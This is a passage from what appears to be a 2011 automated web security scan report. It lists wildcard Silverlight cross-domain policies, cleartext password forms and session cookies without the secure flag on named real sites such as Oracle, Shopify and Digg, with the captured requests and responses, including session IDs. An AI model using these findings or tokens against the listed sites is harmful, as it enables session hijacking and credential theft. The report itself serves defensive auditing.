<domain uri="http://*.fareast.corp.microsoft.com:8080" />
<domain uri="http://*.fareast.corp.microsoft.com:8095" />
<domain uri="https://*.fareast.corp.microsoft.com"/>
<domain uri="https://*.fareast.corp.microsoft.com:9443" />
<domain uri="http://*.msnbc-test.msnbc.com"/>
<domain uri="http://*.msnbc-test.msnbc.com:8080"/>
<domain uri="http://*.msnbc-test.msnbc.com:8095"/>
<domain uri="https://*.msnbc-test.msnbc.com"/>
<domain uri="https://*.msnbc-test.msnbc.com:9443"/>
...[SNIP]...

5.22. http://msnbcmedia.msn.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msnbcmedia.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: msnbcmedia.msn.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:08:37 GMT
Content-Length: 1330
Content-Type: text/xml
ETag: "0a59338016cc1:0"
Last-Modified: Thu, 19 May 2011 23:55:16 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com:8080" />
<domain uri="http://*.interactive.msnbc.com:8095" />
<domain uri="https://*.interactive.msnbc.com"/>
<domain uri="https://*.interactive.msnbc.com:9443" />
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
<domain uri="http://*.fareast.corp.microsoft.com"/>
<domain uri="http://*.fareast.corp.microsoft.com:8080" />
<domain uri="http://*.fareast.corp.microsoft.com:8095" />
<domain uri="https://*.fareast.corp.microsoft.com"/>
<domain uri="https://*.fareast.corp.microsoft.com:9443" />
<domain uri="http://*.msnbc-test.msnbc.com"/>
<domain uri="http://*.msnbc-test.msnbc.com:8080"/>
<domain uri="http://*.msnbc-test.msnbc.com:8095"/>
<domain uri="https://*.msnbc-test.msnbc.com"/>
<domain uri="https://*.msnbc-test.msnbc.com:9443"/>
...[SNIP]...

5.23. http://www.cnbc.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 14:41:54 GMT
Via: 1.1 C aicache6
Content-Length: 1330
X-Aicache-OS: 207.46.150.45:80
Connection: close
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:57:33 GMT

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com:8080" />
<domain uri="http://*.interactive.msnbc.com:8095" />
<domain uri="https://*.interactive.msnbc.com"/>
<domain uri="https://*.interactive.msnbc.com:9443" />
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
<domain uri="http://*.fareast.corp.microsoft.com"/>
<domain uri="http://*.fareast.corp.microsoft.com:8080" />
<domain uri="http://*.fareast.corp.microsoft.com:8095" />
<domain uri="https://*.fareast.corp.microsoft.com"/>
<domain uri="https://*.fareast.corp.microsoft.com:9443" />
<domain uri="http://*.msnbc-test.msnbc.com"/>
<domain uri="http://*.msnbc-test.msnbc.com:8080"/>
<domain uri="http://*.msnbc-test.msnbc.com:8095"/>
<domain uri="https://*.msnbc-test.msnbc.com"/>
<domain uri="https://*.msnbc-test.msnbc.com:9443"/>
...[SNIP]...

6. Cleartext submission of password

There are 6 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://digg.com/submit

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=23877 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8467

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

6.2. http://www.bigcommerce.com/freetrial.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bigcommerce.com
Path:   /freetrial.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /freetrial.php HTTP/1.1
Host: www.bigcommerce.com
Proxy-Connection: keep-alive
Referer: http://www.bigcommerce.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 10579
Connection: close
Content-Type: text/html

<style>

.FreeTrialForm { background:#FFF !important; border:1px solid transparent !important; }
.FreeTrialForm p { color:black !important; }
.NoCCRequired { color:gray !important; font-weight:bold; }
...[SNIP]...
</div>
<form action="/signup.php" name="signupform" method="post" onsubmit="return CheckHPForm()" style="margin: 0px;">
   
   
                               <input type="hidden" name="roi_formpage" value="/freetrial.php" />
...[SNIP]...
<td>
               <input type="password" value="" style="margin-top: 5px; width: 98%;" id="password" name="password"/>
               <div style="font-size: 11px; color: gray; font-style: italic;">
...[SNIP]...
<td>
               <input type="password" value="" style="margin-top: 5px; width: 98%;" id="password2" name="password2"/>
           </td>
...[SNIP]...

6.3. http://www.oraclecfo.com/Authentication/Login_w.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oraclecfo.com
Path:   /Authentication/Login_w.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /Authentication/Login_w.html?url=LwAAAG8AAAByAAAAYQAAAGMAAABsAAAAZQAAADAAAAA5AAAALgAAAGkAAABjAAAAbwAAAA== HTTP/1.1
Host: www.oraclecfo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hbwp4rmax55h0c45eof5yo45; OracleCFOCountry=282; _pk_ref.3.469e=%5B%22%22%2C%22%22%2C1315343453%2C%22http%3A%2F%2Fwww.oracle.com%2Findex.html%23%22%5D; _pk_id.3.469e=39092d4d809db2e1.1315343453.1.1315343453.1315343453; _pk_ses.3.469e=*; OracleCFOLanguage=46; OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:11:22 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 19964


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<![endif]-->
   
<form name="CFOForm" method="post" action="/Authentication/Login_w.html?url=LwAAAG8AAAByAAAAYQAAAGMAAABsAAAAZQAAADAAAAA5AAAALgAAAGkAAABjAAAAbwAAAA==" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_cphPlaceholder_ctl00_btnLogin')" id="CFOForm">
<div>
...[SNIP]...
<dd class="floatright clearRight" style="margin-bottom: 0;">
                                   <input name="ctl00$cphPlaceholder$ctl00$txtPassword" type="password" id="ctl00_cphPlaceholder_ctl00_txtPassword" class="mandatory xlgTextbox" />
                               </dd>
...[SNIP]...

6.4. http://www.oraclecfo.com/Main/Home/Home_w.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oraclecfo.com
Path:   /Main/Home/Home_w.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

   http://www.oraclecfo.com/Main/Home/Home_w.html

The form contains the following password field:

   ctl00$ucNavigationBar$LoginBar_w1$txtPassword

Request

GET /Main/Home/Home_w.html HTTP/1.1
Host: www.oraclecfo.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/index.html#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:10:45 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 52760


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<![endif]-->

<form name="CFOForm" method="post" action="/Main/Home/Home_w.html" id="CFOForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$ucNavigationBar$LoginBar_w1$txtPassword" type="password" id="ctl00_ucNavigationBar_LoginBar_w1_txtPassword" class="text" />
</li>
...[SNIP]...

6.5. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oraclecfo.com
Path:   /Main/Solutions/Solutions_w.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

   http://www.oraclecfo.com/Main/Solutions/Solutions_w.html?mode=1&articleID=2243&categoryID=82

The form contains the following password field:

   ctl00$ucNavigationBar$LoginBar_w1$txtPassword

Request

GET /Main/Solutions/Solutions_w.html?mode=1&articleID=2243&categoryID=82 HTTP/1.1
Host: www.oraclecfo.com
Proxy-Connection: keep-alive
Referer: http://www.oraclecfo.com/Main/Home/Home_w.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hbwp4rmax55h0c45eof5yo45; _pk_ref.3.469e=%5B%22%22%2C%22%22%2C1315343453%2C%22http%3A%2F%2Fwww.oracle.com%2Findex.html%23%22%5D; _pk_id.3.469e=39092d4d809db2e1.1315343453.1.1315343453.1315343453; _pk_ses.3.469e=*; OracleCFOCountry=282; OracleCFOLanguage=46; OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:12:24 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 50539


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<![endif]-->
   
<form name="CFOForm" method="post" action="/Main/Solutions/Solutions_w.html?mode=1&amp;articleID=2243&amp;categoryID=82" id="CFOForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$ucNavigationBar$LoginBar_w1$txtPassword" type="password" id="ctl00_ucNavigationBar_LoginBar_w1_txtPassword" class="text" />
</li>
...[SNIP]...

6.6. http://www.shopify.com/login

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopify.com
Path:   /login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP (the form has no action attribute, so it submits to the page's own URL):

   http://www.shopify.com/login

The form contains the following password field:

   password

Request

GET /login HTTP/1.1
Host: www.shopify.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/examples
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _y=76726C16-B1FA-490A-93B3; optimizelyEndUserId=oeu1315341237551r0.5390826954971999; wcsid=4XOE7W6GWNHMEHMYS9583VOC78556641; hblid=JAQBX9FF2NF9W8U5RWCURZAD78556641; optimizelyBuckets=%7B%7D; __utma=262205262.1105150939.1315341127.1315341127.1315341127.1; __utmb=262205262.8.10.1315341127; __utmc=262205262; __utmz=262205262.1315341127.1.1.utmgclid=CK6YvLv4iKsCFSE8gwod-iiK3g|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; olarkld=1315341237560; _oklv=1315341242826; _s=08DB14DB-F588-4766-8659; __ar_v4=EBPLYDUJ5RCZ3C7MBENLBV%3A20110906%3A3%7C3CUMSMM7PFGSTPKIXDFOOO%3A20110906%3A3%7C4X7ERY5MVFDBLHMTRJRP2G%3A20110906%3A1%7CRFYZ2NEPUVBUFENBCOH6GL%3A20110906%3A2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
ETag: "5e6cd1cceddc58f0b1054bb20da87a2e"
X-Rack-Cache: fresh
X-Content-Digest: 3f0391ebb89e0d08d8add07de6cf12a5cb1d4dee
X-Runtime: 1746
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 15228
Date: Tue, 06 Sep 2011 15:40:58 GMT
X-Varnish: 1482397443 1482397441
Age: 108
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<div class="col-5" style="padding-top:25px;">
           <form method="post">
               <label for="subdomain">
...[SNIP]...
</label><input class="formnote" id="password" type="password" name="password" value="" /><!-- <span class="formnote">
...[SNIP]...

7. SSL cookie without secure flag set
There are 68 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


7.1. https://forums.oracle.com/forums/adfAuthentication

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/adfAuthentication

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

   JSESSIONID

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/adfAuthentication?success_url=/main.jspa?categoryID=84 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; BIGipServerforums_prod_pool=51417741.20480.0000; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84

Response

HTTP/1.1 302 Moved Temporarily
Server: Oracle-Application-Server-10g
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~5D09C635ADF7FCDB0B22A013B7D8A7E733E380B6F6B6FECC2930922D66B8A284C6CAC96F2D43EDA75D75999112956B40FF55201353C5FF03211190E58DE009348F6D3456BA825C6590982D6D5B75724AC9C814653CA5B4274DF09863BB77CA0770B13679F52272A0D1E2FE7CA3525FF488B1976FEF2DF74B823F474CB693675BC66F11D8776FC908E5FFD08D5EEEC4F5C523677FFE230719283092BCC55C29D4C61D4D7016E82800B744931F8E3DF98D4ED662639D486F749A20DED6E2B1D87CCF2068965103F4675905FB43A8DED28469B093EC4D09E6686DE6852A4B2608F1844974BE4B33DFF805A1E7EEB276CEA7
Osso-Paranoid: false
Content-Type: text/html
Content-Length: 0
Date: Tue, 06 Sep 2011 16:14:09 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums


7.2. https://forums.oracle.com/forums/category.jspa

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/category.jspa

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

   JSESSIONID
   BIGipServerforums_prod_pool

The JSESSIONID cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/category.jspa?categoryID=18 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343572368; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Content-Length: 123998
Date: Tue, 06 Sep 2011 16:13:12 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums
Set-Cookie: BIGipServerforums_prod_pool=202412685.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>


<title>OTN Discussion Forums : Database</title>
<meta http-equiv="content-type" content="te
...[SNIP]...

7.3. https://forums.oracle.com/forums/guestsettings!default.jspa

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/guestsettings!default.jspa

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

   JSESSIONID

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/guestsettings!default.jspa HTTP/1.1
Host: forums.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Content-Language: en
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 17:07:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=8d92100c30d7caf68638f82744638e708dcb2aab2d2d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums
Content-Length: 36286

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>


<title>OTN Discussion Forums : Forum Settings</title>
<meta http-equiv="content-type" conte
...[SNIP]...

7.4. https://forums.oracle.com/forums/index.jspa

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/index.jspa

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

   JSESSIONID

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/index.jspa?cat=1 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343572368; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 302 Moved Temporarily
Server: Oracle-Application-Server-10g
Content-Language: en-US
Location: https://forums.oracle.com/forums/main.jspa?categoryID=84
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 16:13:25 GMT
Connection: keep-alive
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums
Content-Length: 246

<HTML><HEAD><TITLE>Redirect to http://forums.oracle.com/forums/main.jspa?categoryID=84</TITLE></HEAD><BODY><A HREF="http://forums.oracle.com/forums/main.jspa?categoryID=84">http://forums.oracle.com/fo
...[SNIP]...

7.5. https://forums.oracle.com/forums/login!withRedirect.jspa

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/login!withRedirect.jspa

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

   JSESSIONID

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/login!withRedirect.jspa HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
